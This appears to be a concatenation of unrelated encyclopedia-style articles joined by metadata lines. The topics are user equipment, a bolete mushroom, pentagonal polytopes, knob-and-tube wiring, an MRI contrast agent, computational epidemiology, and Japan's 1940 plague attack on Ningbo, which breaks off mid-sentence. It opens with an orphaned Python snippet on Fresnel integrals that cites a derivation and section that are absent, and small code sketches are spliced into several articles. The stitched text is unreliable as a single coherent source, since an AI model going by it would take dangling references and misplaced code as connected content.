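A quick numerical check of the limit just derived can be done with SciPy. One caveat, which is the convention difference noted in the Definition section: scipy.special.fresnel computes the normalized integrals (argument (π/2)t²), whose limits at infinity are 1/2, while the un-normalized S(x) and C(x) used above tend to √(π/8).

```python
# Numerical sanity check of the Fresnel integral limits using SciPy.
import numpy as np
from scipy.special import fresnel

# Normalized Fresnel integrals at a large argument: both approach 1/2.
S_norm, C_norm = fresnel(50.0)
print(S_norm, C_norm)            # both close to 0.5

# Recover the un-normalized convention S(x) = int_0^x sin(t^2) dt via the
# substitution t = v * sqrt(pi/2):  S(x) = sqrt(pi/2) * S_norm(x*sqrt(2/pi)).
x = 50.0
S_un = np.sqrt(np.pi / 2) * fresnel(x * np.sqrt(2 / np.pi))[0]
print(S_un, np.sqrt(np.pi / 8))  # both close to 0.6267
```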
Fresnel integral
Physics,Chemistry,Materials_science,Mathematics
1,359
427,292
https://en.wikipedia.org/wiki/User%20equipment
In the Universal Mobile Telecommunications System (UMTS) and 3GPP Long Term Evolution (LTE), user equipment (UE) is any device used directly by an end-user to communicate. It can be a hand-held telephone, a laptop computer equipped with a mobile broadband adapter, or any other device. It connects to the base station (Node B in UMTS, eNodeB in LTE) as specified in the ETSI 125/136-series and 3GPP 25/36-series of specifications. It roughly corresponds to the mobile station (MS) in GSM systems. The radio interface between the UE and the Node B is called Uu; in the context of UMTS, Uu denotes the interface between the UMTS Terrestrial Radio Access Network (UTRAN) and the UE. Functionality The UE handles the following tasks towards the core network: Mobility management Call control Session management Identity management The corresponding protocols are transmitted transparently via a Node B; that is, the Node B does not change, use or understand the information. These protocols are also referred to as Non-Access Stratum (NAS) protocols. The UE initiates calls and is the terminal device in the network. References External links 3GPP 25-series of specifications 3GPP 36-series of specifications UMTS Mobile telecommunications standards 3GPP standards
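The NAS transparency described above can be sketched in a few lines of Python. This is an illustrative model only: the class names, the message byte string, and the return values are invented for the sketch and do not come from the 3GPP specifications.

```python
# Toy model of the architectural point above: the Node B relays NAS
# payloads between the UE and the core network without interpreting them.

class CoreNetwork:
    def handle_nas(self, nas_payload: bytes) -> str:
        # Only the core network interprets NAS procedures
        # (mobility management, call control, session management, ...).
        return f"core accepted NAS procedure: {nas_payload.decode()}"

class NodeB:
    """Radio access node: forwards NAS payloads transparently."""
    def __init__(self, core: CoreNetwork):
        self.core = core

    def relay(self, nas_payload: bytes) -> str:
        # No parsing, no modification: the payload is opaque here.
        return self.core.handle_nas(nas_payload)

class UE:
    def __init__(self, node_b: NodeB):
        self.node_b = node_b

    def attach(self) -> str:
        # The UE initiates the procedure over the Uu interface.
        return self.node_b.relay(b"ATTACH_REQUEST")

print(UE(NodeB(CoreNetwork())).attach())
```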
User equipment
Technology
284
74,384,507
https://en.wikipedia.org/wiki/Lanmaoa%20asiatica
Lanmaoa asiatica is a species of bolete mushroom in the family Boletaceae that is native to southwest China and adjacent regions. It is reddish in color and is an ectomycorrhizal symbiont of the Yunnan pine, Pinus yunnanensis. It is considered a choice wild edible in Yunnan Province and may contain hallucinogenic compounds, which may or may not be removable by cooking. It is unclear what compounds in the fungus could cause such hallucinations, but if they exist, they are likely to be different from those in psilocybin mushrooms. US Treasury Secretary Janet Yellen ate a dish containing L. asiatica while visiting China in July 2023. References Boletaceae Fungi described in 2015 Fungi of China Fungus species
Lanmaoa asiatica
Biology
161
33,020,517
https://en.wikipedia.org/wiki/Pentagonal%20polytope
In geometry, a pentagonal polytope is a regular polytope in n dimensions constructed from the Hn Coxeter group. The family was named by H. S. M. Coxeter, because the two-dimensional pentagonal polytope is a pentagon. It can be named by its Schläfli symbol as {5, 3^(n−2)} (dodecahedral) or {3^(n−2), 5} (icosahedral). Family members The family starts as 1-polytopes and ends with n = 5 as infinite tessellations of 4-dimensional hyperbolic space. There are two types of pentagonal polytopes; they may be termed the dodecahedral and icosahedral types, by their three-dimensional members. The two types are duals of each other. Dodecahedral The complete family of dodecahedral pentagonal polytopes are: Line segment, { } Pentagon, {5} Dodecahedron, {5, 3} (12 pentagonal faces) 120-cell, {5, 3, 3} (120 dodecahedral cells) Order-3 120-cell honeycomb, {5, 3, 3, 3} (tessellates hyperbolic 4-space; ∞ 120-cell facets) The facets of each dodecahedral pentagonal polytope are the dodecahedral pentagonal polytopes of one less dimension. Their vertex figures are the simplices of one less dimension. Icosahedral The complete family of icosahedral pentagonal polytopes are: Line segment, { } Pentagon, {5} Icosahedron, {3, 5} (20 triangular faces) 600-cell, {3, 3, 5} (600 tetrahedral cells) Order-5 5-cell honeycomb, {3, 3, 3, 5} (tessellates hyperbolic 4-space; ∞ 5-cell facets) The facets of each icosahedral pentagonal polytope are the simplices of one less dimension. Their vertex figures are icosahedral pentagonal polytopes of one less dimension. Related star polytopes and honeycombs The pentagonal polytopes can be stellated to form new star regular polytopes: In two dimensions, we obtain the pentagram {5/2}, In three dimensions, this forms the four Kepler–Poinsot polyhedra, {3,5/2}, {5/2,3}, {5,5/2}, and {5/2,5}. In four dimensions, this forms the ten Schläfli–Hess polychora: {3,5,5/2}, {5/2,5,3}, {5,5/2,5}, {5,3,5/2}, {5/2,3,5}, {5/2,5,5/2}, {5,5/2,3}, {3,5/2,5}, {3,3,5/2}, and {5/2,3,3}. In four-dimensional hyperbolic space there are four regular star-honeycombs: {5/2,5,3,3}, {3,3,5,5/2}, {3,5,5/2,5}, and {5,5/2,5,3}. In some cases, the star pentagonal polytopes are themselves counted among the pentagonal polytopes. Like other polytopes, regular stars can be combined with their duals to form compounds; In two dimensions, a decagrammic star figure {10/2} is formed, In three dimensions, we obtain the compound of dodecahedron and icosahedron, In four dimensions, we obtain the compound of 120-cell and 600-cell. Star polytopes can also be combined. Notes References Kaleidoscopes: Selected Writings of H.S.M. Coxeter, edited by F. Arthur Sherk, Peter McMullen, Anthony C. Thompson, Asia Ivic Weiss, Wiley-Interscience Publication, 1995, (Paper 10) H.S.M. Coxeter, Star Polytopes and the Schlafli Function f(α,β,γ) [Elemente der Mathematik 44 (2) (1989) 25–36] Coxeter, Regular Polytopes, 3rd. ed., Dover Publications, 1973. . (Table I(ii): 16 regular polytopes {p, q, r} in four dimensions, pp. 292–293) Regular polytopes Multi-dimensional geometry
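Since the two families of Schläfli symbols differ only in where the 5 sits, they are easy to enumerate programmatically. The following Python sketch (function names and output format are my own) generates the symbols listed above for dimensions 2 through 5:

```python
# Generate the Schlafli symbols {5, 3, ..., 3} and {3, ..., 3, 5} of the
# dodecahedral and icosahedral pentagonal polytopes in n >= 2 dimensions.

def dodecahedral_symbol(n):
    """{5, 3^(n-2)}: a 5 followed by n-2 threes."""
    return "{" + ", ".join(["5"] + ["3"] * (n - 2)) + "}"

def icosahedral_symbol(n):
    """{3^(n-2), 5}: n-2 threes followed by a 5."""
    return "{" + ", ".join(["3"] * (n - 2) + ["5"]) + "}"

for n in range(2, 6):
    print(n, dodecahedral_symbol(n), icosahedral_symbol(n))
# 2 {5} {5}                    -- the pentagon (self-dual)
# 3 {5, 3} {3, 5}              -- dodecahedron and icosahedron
# 4 {5, 3, 3} {3, 3, 5}        -- 120-cell and 600-cell
# 5 {5, 3, 3, 3} {3, 3, 3, 5}  -- hyperbolic 4-space honeycombs
```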
Pentagonal polytope
Physics
981
5,444,091
https://en.wikipedia.org/wiki/Knob-and-tube%20wiring
Knob-and-tube wiring (sometimes abbreviated K&T) is an early standardized method of electrical wiring in buildings, in common use in North America from about 1880 to the 1930s. It consisted of single-insulated copper conductors run within wall or ceiling cavities, passing through joist and stud drill-holes via protective porcelain insulating tubes, and supported along their length on nailed-down porcelain knob insulators. Where conductors entered a wiring device such as a lamp or switch, or were pulled into a wall, they were protected by flexible cloth insulating sleeving called loom. The first insulation was asphalt-saturated cotton cloth, then rubber became common. Wire splices in such installations were twisted together for good mechanical strength, then soldered and wrapped with rubber insulating tape and friction tape (asphalt saturated cloth), or made inside metal junction boxes. Knob and tube wiring was eventually displaced from interior wiring systems because of the high cost of installation compared with use of power cables, which combined both power conductors of a circuit in one run (and which later included grounding conductors). At present, new concealed knob and tube installations are allowed in the U.S. only by special permission. Elements Ceramic knobs were cylindrical and generally nailed directly into the wall studs or floor joists. Most had a circular groove running around their circumference, although some were constructed in two pieces with pass-through grooves on each side of the nail in the middle. A leather washer often cushioned the ceramic, to reduce breakage during installation. Wires were wrapped around the knob and secured with tie wires, allowing the knob to anchor the wire securely and permanently. The knobs separated the wire from potentially combustible framework, facilitated changes in direction, and ensured that wires were not subject to excessive tension. Because the wires were suspended in air, they could dissipate heat well. Ceramic tubes were inserted into holes bored in wall studs or floor joists, and the wires were directed through them. This kept the wires from coming into contact with the wood framing members and from being compressed by the wood as the house settled. Ceramic tubes were sometimes also used when wires crossed over each other, for protection in case the upper wire were to break and fall on the lower conductor. Ceramic cleats, which were block-shaped pieces, served a purpose similar to that of the knobs except that cleats were generally used in places where the wiring was surface mounted. Not all knob and tube installations utilized cleats. Ceramic bushings protected each wire entering a metal device box, when such an enclosure was used. Loom, a woven flexible insulating sleeve, was slipped over insulated wire to provide additional protection whenever a wire passed over or under another wire, when a wire entered a metal device enclosure, and in other situations prescribed by code. Other ceramic pieces would typically be used as a junction point between the wiring system proper, and the more flexible cloth-clad wiring found in light fixtures or other permanent, hard-wired devices. When a generic power outlet was desired, the wiring could run directly into the junction box through a tube of protective loom and a ceramic bushing. Wiring devices such as light switches, receptacle outlets, and lamp sockets were either surface-mounted, suspended, or flush-mounted within walls and ceilings.
Only in the last case were metal boxes always used to enclose the wiring and device. Unusual wiring layouts In many older K&T installations, the supply and return wires were routed separately from each other, rather than being located parallel to and near each other. This direct routing method had the advantage of reduced cost, by allowing use of the shortest possible lengths of wire, but the major disadvantage is that a detailed building wiring diagram is needed for other electricians to understand multiple interwoven circuits, especially if the wiring is not fully visible throughout its length. By contrast, modern electrical codes now require that all residential wiring connections be made only inside protective enclosures, such as junction boxes, and that all connections remain accessible for inspection, troubleshooting, repair, or modification. Under the US electrical code, Carter system wiring layouts have now been banned, even for permissible new installations of K&T wiring. However, electricians must be aware of this older system, which is still present in many existing older electrical installations. Neutral fusing Another practice that was common (or even originally required) in some older K&T designs was the installation of separate fuses in both the hot wire and the neutral (return) wire of an electrical circuit. The failure of a neutral fuse would cut off power flow through the affected circuit, but the hot conductor could still remain hot relative to ground, an unexpected and potentially hazardous situation. If the neutral fuse blew, the neutral conductor could not be relied on to remain near ground potential and could, in fact, be at full line potential (via transmission of voltage through a switched-on light bulb, for example). Modern electrical codes generally do not require a neutral fuse. Instead, they explicitly forbid configurations that might break continuity of the neutral conductor, unless all associated hot conductors are also simultaneously disconnected (for example, by using ganged or "tied" circuit breakers). In retrofit situations electricians may place a higher-value fuse on the neutral, so that it blows last. Advantages In the early 1900s, K&T wiring was less expensive to install than other wiring methods. For several decades, electricians could choose between K&T wiring, conduit, armored cable, and metal junction boxes. The conduit methods were known to be of better quality, but cost significantly more than K&T. In 1909, flexible armored cable cost about twice as much as K&T, and conduit cost about three times the price of K&T. Knob and tube wiring persisted since it allowed owners to wire a building for electricity at lower cost. Modern wiring methods assume that two or more load-carrying conductors will lie very near each other, as for instance in standard NM-2 cable. When installed correctly, the K&T wires are held away from the structural materials by ceramic insulators. Over the K&T era multiple wire types evolved. Early wiring was insulated with cotton cloth and soft rubber, while later wiring was much more robust. Although the actual wire covering may have degraded over the decades, the porcelain standoffs have a nearly unlimited lifespan and will keep any bare wires safely insulated. Today, porcelain standoffs are still commonly used with bare-wire electric fencing for livestock, and such porcelain standoffs carry far higher voltage surges without risk of shorting to ground.
In summary, K&T wiring that was installed correctly, and not damaged or incorrectly modified since then, is fairly safe when used within the original current-carrying limits, typically about ten amperes per circuit. Disadvantages Historically, wiring installation requirements were less demanding in the age of knob-and-tube wiring than today. Compared to modern electrical wiring standards, the main technical shortcomings of knob-and-tube wiring methods are these: it never included a safety grounding conductor; it did not confine switching to the hot conductor (the so-called Carter system, prohibited as of 1923, places electrical loads across the common terminals of a three-way switch pair); it permitted the use of in-line splices in walls without a junction box (however, this downside is offset by the strong nature of the soldered and taped junctions used at the time); and it was susceptible to mechanical damage in accessible areas. Over time, the price of electrician labor grew faster than the cost of materials. This removed the price advantage of K&T methods, especially since they required time-consuming skillful soldering of in-line splices and junctions, and careful hand-wrapping of connections in layers of insulating tape. Knob-and-tube wiring can be made with high current carrying capacity. However, most existing residential knob-and-tube installations, dating to before 1940, have fewer branch circuits than is desired today. While these installations were adequate for the electrical loads at the time of installation, modern households use a range and intensity of electrical equipment unforeseen at the time. Household power use increased dramatically following World War II, due to the wide availability of new electrical appliances and devices. Modern home buyers often find that existing K&T systems lack the capacity for today's levels of power use. First-generation wiring systems became susceptible to abuse by homeowners who would replace blown fuses with fuses rated for higher current. This overfusing of the circuits subjected the wiring to higher levels of current and risked heat damage or fire. Knob-and-tube wiring may also be damaged by building renovations. Its cloth and rubber insulation can dry out and turn brittle. It may also be damaged by rodents and by careless activities such as hanging objects from wiring running in accessible areas like basements or attics. Currently, the United States National Electrical Code forbids the use of loose, blown-in, or expanding foam insulation over K&T wiring. This is because K&T is designed to let heat dissipate to the surrounding air. As a result, energy efficiency upgrades that involve insulating previously uninsulated walls usually also require replacement of the wiring in affected homes. However, California, Washington, Nebraska, and Oregon have modified the NEC to conditionally allow insulation around K&T. These states did not find a single fire attributed to K&T, and they permit insulation provided the home first passes inspection by an electrician. As existing K&T wiring gets older, insurance companies may deny coverage due to a perception of increased risk. Several companies will not write new homeowners policies at all unless all K&T wiring is replaced, or an electrician certifies that the wiring is in good condition. Also, many institutional lenders are unwilling to finance a home with the relatively low-capacity service typical of K&T wiring, unless the electrical service is upgraded.
Partial upgrades, where low-demand lighting circuits are left intact, may be acceptable to some insurers. See also Rat-tail splice T-splice Western Union splice References Further reading External links Electrical wiring
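The hazard described in the "Neutral fusing" section above can be made concrete with a rough calculation. The following Python sketch uses assumed, typical component values (a 120 V line, the hot resistance of a 60 W incandescent lamp, a pessimistic body resistance); the numbers are illustrative, not taken from the article:

```python
# Back-of-the-envelope illustration of the neutral-fusing hazard: with the
# neutral fuse blown and a lamp switched on, almost no current flows, so
# the downstream neutral floats near line potential.

LINE_V = 120.0    # volts, typical North American branch circuit
LAMP_R = 240.0    # ohms, e.g. a 60 W incandescent lamp at temperature
BODY_R = 1_000.0  # ohms, a pessimistic wet-skin body resistance

# Open neutral: no load current, hence no voltage drop across the lamp,
# so the neutral conductor sits at roughly full line potential.
neutral_potential_open = LINE_V  # volts, approximately

# If a person bridges that neutral to ground, current flows through the
# lamp and the body in series:
shock_current = LINE_V / (LAMP_R + BODY_R)
print(f"neutral floats near {neutral_potential_open:.0f} V")
print(f"possible shock current: {shock_current * 1000:.0f} mA")  # ~97 mA
```

Under these assumed values the current is on the order of 100 mA, well above commonly cited thresholds for dangerous shock, which is why modern codes forbid breaking the neutral unless the hot conductors are disconnected at the same time.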
Knob-and-tube wiring
Physics,Engineering
2,118
33,014,565
https://en.wikipedia.org/wiki/Gadofosveset
Gadofosveset (trade names Vasovist, Ablavar) is a gadolinium-based MRI contrast agent. It was used in the form of its trisodium salt monohydrate. It acts as a blood pool agent by binding to human serum albumin. The manufacturer (Lantheus Medical) discontinued production in 2017 due to poor sales. Gadofosveset consists of a gadolinium cation bound to the chelating agent fosveset. It facilitates high-resolution magnetic resonance angiography. Ferumoxytol (trade names Feraheme, Rienso), an intravenous iron-replacement therapy, has shown potential to be superior to gadofosveset as a blood pool agent for MR venography in pediatric patients. References MRI contrast agents Organogadolinium compounds Withdrawn drugs
Gadofosveset
Chemistry
180
2,720,244
https://en.wikipedia.org/wiki/Computational%20epidemiology
Computational epidemiology is a multidisciplinary field that uses techniques from computer science, mathematics, geographic information science and public health to better understand issues central to epidemiology, such as the spread of diseases or the effectiveness of a public health intervention. Computational epidemiology traces its origins to mathematical epidemiology, but began to experience significant growth with the rise of big data and the democratization of high-performance computing through cloud computing. Introduction In contrast with traditional epidemiology, computational epidemiology looks for patterns in unstructured sources of data, such as social media. It can be thought of as the hypothesis-generating antecedent to hypothesis-testing methods such as national surveys and randomized controlled trials. A mathematical model is developed which describes the observed behavior of the pathogen, based on the available data. Simulations of the model are then performed to understand the possible outcomes it predicts. These simulations produce projections which can be used to make predictions or verify facts, and which can then inform the planning of interventions and measures for controlling the disease's spread. References External links Sax Institute - Decision Analytics Computational Epidemiology Lab Computational science Epidemiology
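The modeling loop described above (build a mathematical model, then simulate it to produce projections) can be illustrated with a minimal SIR compartmental model. The parameter values below are assumptions chosen for the sketch, not taken from any study cited in the article:

```python
# Minimal SIR ("susceptible-infected-recovered") simulation illustrating
# how a fitted model is run forward to project an outbreak.

def simulate_sir(beta, gamma, s0, i0, r0, days, dt=0.1):
    """Euler-integrate dS=-beta*S*I, dI=beta*S*I-gamma*I, dR=gamma*I."""
    s, i, r = s0, i0, r0
    trajectory = []
    steps_per_day = round(1 / dt)
    for day in range(days):
        for _ in range(steps_per_day):
            new_inf = beta * s * i * dt   # new infections this step
            new_rec = gamma * i * dt      # new recoveries this step
            s, i, r = s - new_inf, i + new_inf - new_rec, r + new_rec
        trajectory.append((day + 1, s, i, r))
    return trajectory

# Assumed parameters: R0 = beta/gamma = 2.5 with a 10-day infectious period,
# starting from 0.1% of the population infected.
for day, s, i, r in simulate_sir(0.25, 0.1, 0.999, 0.001, 0.0, 100)[::20]:
    print(f"day {day:3d}: S={s:.3f} I={i:.3f} R={r:.3f}")
```

Projections from such runs, repeated across plausible parameter ranges, are what analysts compare against surveillance data before recommending interventions.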
Computational epidemiology
Mathematics,Environmental_science
248
1,944,827
https://en.wikipedia.org/wiki/Kaimingjie%20germ%20weapon%20attack
The Kaimingjie germ weapon attack () was a covert biological warfare attack launched by Japan in October 1940 against the Kaiming Street area of Ningbo, Zhejiang, China. A joint operation of the Imperial Japanese Army's Unit 731 and Unit 1644, the attack was carried out by military planes taking off from Jianqiao Airport in Hangzhou, which airdropped wheat, corn, cotton scraps, and sand infested with plague fleas onto target locations. From September 1940, Ningbo, Quzhou, and other places were subjected to various forms of biological warfare until the end of October 1940, when the attacks triggered a plague epidemic in Ningbo. After the outbreak of the plague, the city authorities in Ningbo built a 4.3-meter-high isolation wall around the epidemic area, segregating patients and suspected cases, and eventually burned down the Kaiming Street area to eradicate the disease. Until the 1960s, this burned area was still referred to as the "plague field". According to the doctoral thesis of Junichi Kaneko, a military doctor of Unit 731, on 27 October 1940, Unit 731 spread 2 kilograms of plague bacteria over Ningbo, Zhejiang, using aircraft, resulting in a total of 1,554 deaths from the first- and second-round infections. Background Japanese biological warfare plan In June 1925, Japan signed the Geneva Protocol, committing itself to refrain from using biological and chemical weapons in warfare. The development of Japan's biological weapons was highly secretive and was led by Shiro Ishii, who planned and raised funds for Japan's biological weapons program. In 1939, the Imperial Japanese Army established Unit 1644 in Nanjing to conduct research on biological and chemical weapons. Units 1644 and 731 studied the effects on soldiers and civilians of various chemicals and pathogens that could be used as biological weapons, and developed weapons to further expand the Japanese Empire's territory in Asia. After the failure of the rapid decisive victory plan in the war against China, the Japanese military began using bacteriological weapons. In the summer of 1939, during the Battle of Khalkhin Gol, the Imperial Japanese Army used biological and chemical weapons against Soviet and Mongolian troops. On 13 June, large quantities of white powder were airdropped in the vicinity of Lihai, Shaoxing. On 15 June, chemical tests conducted by the local river police did not reveal any abnormalities, but subsequent bacterial culture tests revealed turbidity in one test tube and cotton-like floating substances in another, with pathogens such as tetanus and diphtheria observed under a microscope. In the days after the airdrop, the weather in Shaoxing was clear and sunny, with abundant sunlight, which was not conducive to bacterial growth, so no epidemic outbreak occurred. This is the earliest recorded bacteriological attack by the Japanese military in Zhejiang. Strategic location of Ningbo Before 1937, cities in Zhejiang such as Ningbo, Jinhua, and Quzhou had not experienced a plague epidemic, although people may have been aware of the plague outbreak in nearby Shanghai in 1910. The incubation period of the plague is 2 to 8 days. At the time of the outbreak, sulfa drugs, streptomycin, and other antimicrobial treatments were not available in Ningbo, so residents were treated primarily with serum. Without treatment, the mortality rate of the plague was almost 100%, and there was not enough serum prepared in advance.
After the outbreak of the Second Sino-Japanese War in 1937, Ningbo became one of the important seaports for China to obtain international aid supplies, with a daily throughput of over 10,000 tons of goods. As a port city with a population of 260,000, Ningbo had numerous streets, dense housing, a crowded population, relatively poor sanitary conditions, high population mobility, and a constant flow of goods in and out, making it easy for plague to spread through the movement of people and goods. Kaiming Street is a main north-south road in Ningbo and the main commercial centre of the old city. Since the first Japanese air raid on Lishe Airport on 16 August 1937, the Japanese military had directly attacked Ningbo at least seven times. On 17 July 1940, the Japanese military first invaded Zhenhai, but was driven out by the Chinese army on 22 July. The Japanese military again bombed Ningbo on 5 and 10 September of the same year. Operation Decision-making In June 1940, the Imperial Japanese Army headquarters formally discussed the use of biological weapons and issued orders to begin biological warfare. On 5 June 1940, discussions on the implementation of bacteriological warfare were held by Colonel Kozo Aramaki from the Operations Department of the Imperial Japanese Army General Staff, Major Kumaomi Imoto from the China Expeditionary Army Staff, and Lieutenant Colonel Tomosada Masuda, acting commander of Unit 1644 in Nanjing. It was decided during the discussions that the main cities in Zhejiang would be targeted, and that the method of operation would involve dispersing bacterial liquids from aircraft and air-dropping fleas infected with plague. On 6 August, a heavily guarded train departed from the barracks of Unit 731 in Pingfang, bound for Hangzhou. The train was loaded with 700 aerial bombs, 20 vehicles, 70 kilograms of Salmonella typhi, 50 kilograms of Vibrio cholerae, and 5 kilograms of plague fleas. Shiro Ishii was the overall director of this operation. On 10 September 1940, negotiations were held in Hangzhou between the Central China Expeditionary Army and the Nara Unit, responsible for bacteriological warfare and composed of personnel from Unit 731 and Unit 1644, to select the targets for the attacks: Ningbo and Quzhou, with Jinhua as a backup, coinciding with the Imperial Japanese Navy's blockade of Ningbo Port, in place since July 1940. The Japanese army also referred to this operation as "Operation Hangzhou". According to the plan, aircraft would take off from Hangzhou Jianqiao Airport and drop ceramic bacteriological bombs developed by Shiro Ishii himself, along with cotton, shredded cloth, and other materials to protect the fleas. Corn and cloth were infested with fleas carrying pathogens of cholera and plague to infect rats, which would then transmit the diseases to human hosts. Air raids During the three-month-long bacteriological warfare, six areas including Ningbo were subjected to various forms of bacteriological attacks.
In Quzhou, the Japanese employed aircraft to scatter grain and wheat seeds carrying bacteria; in Ningbo, aircraft were used to spread bacterium-laden grains and cotton within or around the city; in Jinhua, explosions from bombs dropped by aircraft produced a pale yellow smoke; in Yushan, bacteria were released among ordinary residents: pathogens were introduced into residents' water pools and wells, and the Imperial Japanese Army placed hundreds of seemingly abandoned desserts and fruits, injected with large quantities of typhoid and paratyphoid bacteria, at doorsteps and beside trees, deceiving local residents who lacked food into eating them. On 4 October 1940, wheat and barley dropped by Japanese aircraft were found in Quzhou. That afternoon, the county magistrate ordered the residents of Quzhou to gather and burn the air-dropped items. Starting from 10 October, the area began to see deaths from the diseases. From 18 September to 8 October, the Japanese launched a total of six attacks on Ningbo, none of which resulted in a plague outbreak, and despite fleas being dropped in Quzhou on 4 October, there were no apparent effects there by the end of October. On 22 October, Japanese military aircraft flew over Ningbo and dropped wheat and other items. The airstrikes in Quzhou did not attract the attention of the provincial government, which instead focused on a plague outbreak in Qingyuan that was not associated with the Imperial Japanese Army. At around 7 a.m. on 27 October, air raid sirens sounded in downtown Ningbo, and Japanese military aircraft flew over the streets of the city, dropping leaflets instead of bombs. According to eyewitness Hu Xianzhong, the leaflets depicted the flags of Japan, Germany, and Italy, and a cartoon portraying "Sino-Japanese friendship," claiming that Chongqing was suffering from famine and hardship while the Japanese people were well-fed and had surplus food to help them. Around 2 p.m., Japanese aircraft reappeared and airdropped barley, millet, flour, and clusters of cotton balls. Archibald Crouch, an American missionary in Ningbo, noted in his diary that while Japanese aircraft usually arrived over Ningbo in groups, this time there was only a single aircraft, which was unusual, and that after the aircraft passed it seemed to release a cloud that dispersed downward. Local residents had no experience of a plague outbreak, and no one suggested that day that this had been a biological weapons attack. Epidemic Early spread In 1940, Ningbo did not yet have piped water, so it was common for households to collect rainwater for drinking and cooking in one or two large jars placed under the eaves of their courtyards. On the evening of 27 October, heavy rain in Ningbo washed wheat grains from rooftops into these water jars. Some poultry that consumed the wheat grains died the following day. People noticed a sudden increase in fleas in Donghou Street and Kaiming Street, but there were no reports of deaths among rodents. Rumours circulated that the Japanese air raid had actually been a biological weapons attack. On 30 October, according to the local Chinese-language newspaper Shishi Gongbao, an acute disease outbreak was reported in Kaiming Street of Ningbo and was spreading severely. Within just three days, over 10 deaths were reported.
Subsequently, people from neighbouring establishments such as Wang Shunxing's bakery, Hu Yuanxing's dominoes shop, the Yuan Tai Hotel, the Bao Changxiang underwear shop on East Zhongshan Road, and the vicinity of Donghou Street all experienced fatalities. Infected individuals exhibited symptoms including high fever, headache, dizziness, a staggering gait, sometimes confusion, swelling and pain in the lymph nodes, and diarrhoea before death. Initially, people mistook the disease for buboes or malignant malaria. People sought quinine from hospitals, but it proved ineffective. On the morning of 1 November, nearly ten households in Kaiming Street, East Main Road, Donghou Street, and Taiping Alley reported deaths, with an increasing number suffering from colds and fever. Nine people succumbed to the disease on that day alone. Immediate responses On 1 November, the government of Yin County invited physicians to form a prevention and control committee, with Zhang Fangqing, the director of the Central Hospital, appointed as the head of the Medical Affairs Department, and Sun Jinshi as the attending physician. Based on Sun Jinshi's preliminary diagnosis of patient symptoms, they suspected plague, with the majority of patients suffering from septicemic plague and a minority from bubonic plague, and no cases of pneumonic plague detected. Ding Licheng, the director of Hwa Mei Hospital, stated that it was still uncertain whether it was a genuine plague. On the evening of 2 November, the county government imposed a blockade and isolation on the area and conducted routine disinfection of households. As a preventive measure, bed sheets and cloth were burned, and officials promptly began vaccinations. By 3 November, 16 deaths had occurred, followed by another 7 the next day. The highest recorded death toll in a single day was 20. Wails echoed along Kaiming Street, and mourners clad in mourning attire were everywhere. Ding Licheng obtained samples through lymph node puncture fluid examination and had the plague bacillus detected by Hwa Mei's examiner Xu Guofang, followed by multiple tests and rechecks by the provincial health department. On 4 November, Ding Licheng issued a statement to the Shishi Gongbao, officially declaring the epidemic to be plague. Quarantine From 4 November onwards, an isolation zone spanning over 5,000 square metres around the affected area was demarcated. Because transporting patients to Dayuwangmiao was inconvenient due to its distance from the outbreak site, a Class A isolation hospital was established in the Tongshun Store within the isolation zone to admit patients exhibiting clear symptoms. Additionally, a Class B isolation hospital was established at the Kaiming Lecture Hall on Kaiming Street, adjacent to the outbreak area, to accommodate individuals suspected of being infected. On 5 November, the local newspaper Shishi Gongbao issued an official announcement titled Great Disaster: All Citizens Unite to Eradicate the Plague, along with the publication of the first epidemic prevention special edition. Subsequently, daily updates on epidemic prevention measures continued to be featured.
The county secretary, Zhang Hongbin, assumed temporary control of the county government, and on 6 November the Yin County Epidemic Prevention Office was established, concurrently forming a team to search for fugitive patients. Township governments under the county also issued a notice refusing to accommodate residents from the affected area. Schools, public places, hotels, and restaurants ceased operations one after another. From that day onwards, families were prohibited from burying bodies privately, and all deceased patients were required to be buried deep at Laolongwan in the southwest suburbs. Starting on 7 November, three quarantine hospitals, designated Class A, Class B, and Class C, were established. Class A was tasked with treating confirmed plague patients, while Class B oversaw asymptomatic residents under observation within the affected area and Class C dealt with suspected patients both inside and outside the epidemic area. The Class A and Class C hospitals were located at the Tongshun Store and the Kaiming Hermitage; the Class B hospital was within the Yongyao Power Building. Residents' clothing, miscellaneous items, and furniture were disinfected and transported by stretcher teams. To address the handling of materials within the epidemic area, a property registration office was established to register all houses and items within the epidemic area. For valuable or movable items, disinfection was mandatory before removal from the epidemic area. Two large stoves were constructed on the open ground of Kaiming Lane in the southwest corner of the epidemic area for boiling and disinfection purposes. Disinfection personnel wore protective clothing and hats, and, based on the household information in the registration book, items were removed for disinfection house by house, with family members responsible for collection. On 8 November, the Yin County government held its second epidemic prevention meeting, mandating that residents within the epidemic area and other relevant individuals receive preventive injections of the plague vaccine. To facilitate this, the county government established a dedicated vaccination team covering an area centred on the Kaiming Street epidemic zone, extending east to Qizha Street, south to Daliang Street, west to the North and South Main Roads, and north to Cangshui Street in the city centre. All residents, including primary and secondary school students, were required to receive the vaccination. On 10 November, Chen Wanli, Director of the Zhejiang Provincial Health Department, led the 17th Epidemic Prevention Team of the National Health Administration to Ningbo with the vaccines. In total, 23,343 individuals received the injections. From 8 November onwards, a wall measuring over one yard high was erected around the perimeter of the epidemic area. The wall's surface was plastered with mud and its top covered with arched white iron sheets. Additionally, an isolation trench three feet wide and four feet deep was dug outside the wall to prevent the spread of the epidemic, ensuring that plague-carrying fleas could not escape. To prevent the spread of the disease, the disinfection team implemented a series of measures. They sealed the cracks along the street walls with white paper and sprayed lime water along the way. Shops and houses were sealed and subjected to 12 hours of sulphur fumigation for disinfection. Furthermore, ceilings and floors were pried open and doused with lime water, and the bodies of dead rats were thoroughly removed.
Additionally, all domestic animals such as dogs and cats within the epidemic area were culled. On 14 November, the search team for escaped patients apprehended 14 individuals. Subsequently, a total of 38 residents who had fled the epidemic area were gradually recovered; the number of deaths among those who had escaped the area reached 32. From 15 November onwards, concerns about personal safety were openly expressed by those responsible for sealing off and isolating the area, and from 23 November there were public complaints and protests against the isolation measures. Local media also began questioning the authenticity of the epidemic, and those raising doubts and objections were officially rebutted and condemned. However, few questioned the isolation measures themselves, indicating that the community understood the risks involved and supported such actions. Burning The epidemic area comprised over 200 houses, mostly of brick and wood construction. Along East Main Road and Kaiming Street, the street-facing houses typically had three storeys (or a false third storey), while those within the alleys were mostly two-storey or single-storey buildings. Experts concluded that conventional disinfection could not thoroughly eradicate the source of the epidemic: the area was densely built and situated in a bustling urban district, and beneath the houses there had once been a small river, purchased and filled in by homeowners during the expansion of East Main Road, remnants of which remained in some places, filled with debris. At the 19th anti-epidemic meeting held on 28 November, because of the poor condition of the houses in the epidemic area and its low-lying location, which made it an ideal breeding ground for rats and fleas, the county government decided to burn down the epidemic area. The burning 